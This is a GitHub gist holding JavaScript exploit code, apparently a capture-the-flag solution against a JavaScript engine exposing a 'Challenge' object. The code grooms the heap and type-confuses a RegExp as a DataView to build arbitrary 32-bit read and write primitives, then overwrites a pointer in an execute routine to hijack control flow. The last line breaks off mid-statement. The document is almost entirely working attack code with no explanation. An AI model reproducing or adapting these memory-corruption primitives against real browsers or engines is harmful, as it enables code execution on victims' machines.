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Created July 22, 2020 17:09
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  • Save YiChenChai/29bbc3545d86355222b4d525cb34e887 to your computer and use it in GitHub Desktop.
Save YiChenChai/29bbc3545d86355222b4d525cb34e887 to your computer and use it in GitHub Desktop.
String.prototype.repeat=function(count){var str=''+this;count=+count;count=Math.floor(count);var maxCount=str.length*count;count=Math.floor(Math.log(count)/Math.log(2));while(count){str+=str;count--;}
str+=str.substring(0,maxCount-str.length);return str;}
zzzaa = [];
zzzcb1 = new DataView(141);
zzzcb2 = new Number(1337);
zzzcc1 = []; zzzcc2 = []; zzzcc3 = []; zzzcc4 = []; zzzcc5 = []; zzzcc6 = [];
var zzzbb1 = "A".repeat(65534);
var zzzbb2 = "\x11".repeat(64); //64
// 65535 + seplen _+ str1len
var zzzbb3 = [zzzbb1, zzzbb2];
// 511 -> 0x7ffff6683e80
// 510 -> 0x7ffff6683f80
// var lmao = hold[256];
// var8 = [];
zzzbb4 = [];
delete zzzcc2; delete zzzcc1;
delete zzzbb4;
zzzbb5 = new RegExp(zzzbb2);//new DataView(0x100);
// print(zzzbb5);
// // var1.prototype = Number.prototype;
get8 = DataView.prototype.getUint8.bind(zzzbb5);
set8 = DataView.prototype.setUint8.bind(zzzbb5);
get32 = DataView.prototype.getUint32.bind(zzzbb5);
set32 = DataView.prototype.setUint32.bind(zzzbb5);
function read32(address) {
bottom = address & 0xffffffff;
if (bottom < 0) bottom += 0x100000000;
oldl = get32(0x280 + 0x28);
oldh = get32(0x280 + 0x2c);
set32(0x280 + 0x28, bottom);
address -= bottom;
address /= 0x100000000;
set32(0x280 + 0x2c, address & 0xffffffff);
val = zzzcb1.getUint32(0);
set32(0x280 + 0x28, oldl);
set32(0x280 + 0x2c, oldh);
return val;
function write32(address, value) {
bottom = address & 0xffffffff;
if (bottom < 0) bottom += 0x100000000;
oldl = get32(0x280 + 0x28);
oldh = get32(0x280 + 0x2c);
set32(0x280 + 0x28, bottom);
address -= bottom;
address /= 0x100000000;
set32(0x280 + 0x2c, address & 0xffffffff);
val = zzzcb1.setUint32(0, value);
set32(0x280 + 0x28, oldl);
set32(0x280 + 0x2c, oldh);
return val;
function execute(address) {
set8(0x180, 16);
bottom = address & 0xffffffff;
if (bottom < 0) bottom += 0x100000000;
set32(0x180 + 0x38, bottom);
address -= bottom;
address /= 0x100000000;
set32(0x180 + 0x3c, address & 0xffffffff);
zzzcb2.a = 1;
function main() {
// print("hi");
// set8(0x480, 16);
// print(;
// print(Challenge.write());
// print(Challenge.exec());
write32(Challenge.write(), read32(;
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